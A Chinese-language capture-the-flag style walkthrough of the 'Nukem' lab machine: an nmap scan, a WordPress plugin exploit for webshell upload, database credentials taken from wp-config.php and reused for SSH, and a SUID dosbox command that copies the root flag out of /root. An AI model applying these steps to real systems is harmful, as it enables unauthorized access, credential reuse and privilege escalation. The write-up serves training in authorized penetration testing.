Nukem pg walkthrough Intermediate

nmap 扫描

┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.157.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 12:32 UTC
Nmap scan report for 192.168.157.105
Host is up (0.071s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
|   256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
|_  256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
80/tcp    open  http        Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
|_http-generator: WordPress 5.5.1
|_http-title: Retro Gamming – Just another WordPress site
3306/tcp  open  mysql?
| fingerprint-strings:
|   NULL:
|_    Host '192.168.251.157' is not allowed to connect to this MariaDB server
5000/tcp  open  http        Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: 404 Not Found
|_http-server-header: Werkzeug/1.0.1 Python/3.8.5
13000/tcp open  http        nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Login V14
36445/tcp open  netbios-ssn Samba smbd 4.6.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=11/17%Time=6739E2AC%P=x86_64-pc-linux-gnu%
SF:r(NULL,4E,"J\0\0\x01\xffj\x04Host\x20'192\.168\.251\.157'\x20is\x20not\
SF:x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%), Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3.13 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 5.0 (88%), Linux 2.6.32 (87%), Linux 5.0 - 5.5 (87%), Crestron XPanel control system (86%), Linux 3.13 (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops

TRACEROUTE (using port 3306/tcp)
HOP RTT      ADDRESS
1   70.35 ms 192.168.45.1
2   70.33 ms 192.168.45.254
3   71.17 ms 192.168.251.1
4   71.73 ms 192.168.157.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.12 seconds

发现wp plugin存在插件漏洞https://www.exploit-db.com/exploits/48979

成功上传webshell之后我们发现不论怎么反弹shell都弹不回来

这点卡了有点久

后来绝对应该是思路错了换个方向 我们查看wp-config.php 看到数据库的密码 和数据库用户 再看看/etc/passwd发现都有commander用户

猜测ssh commander的用户密码也是数据库密码

/** MySQL database username /

define( 'DB_USER', 'commander' );

/* MySQL database password */

define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );

发现wget 不了 估计是ufw防火墙做设置了 用scp 上传我们的脚步pspy64 和linea

ssh连接成功

发现suid提取

dosbox 具有任意文件读取和任意文件写入

我们读取到了/etc/shadow文件 并爆破root密码爆破不出来

而且这个命令在linux上用就算创建的文件名是小写也会全部变成大写

先投机取巧一下读取个读个/root/proot.txt的flag

dosbox -c 'mount c /' -c "copy c:\root\proof.txt c:\tmp\aaDD" -c exit

cat /tmp/AADD

看了答案发现其实是可以直接调用图形化的dosbox的但是我们是ssh 连的shell没有图形化界面

要用vnc连接就好了 但是由于我们是vps连的靶机vps就是个终端本来就没有图形化界面所以接没搞了

大思路知道就好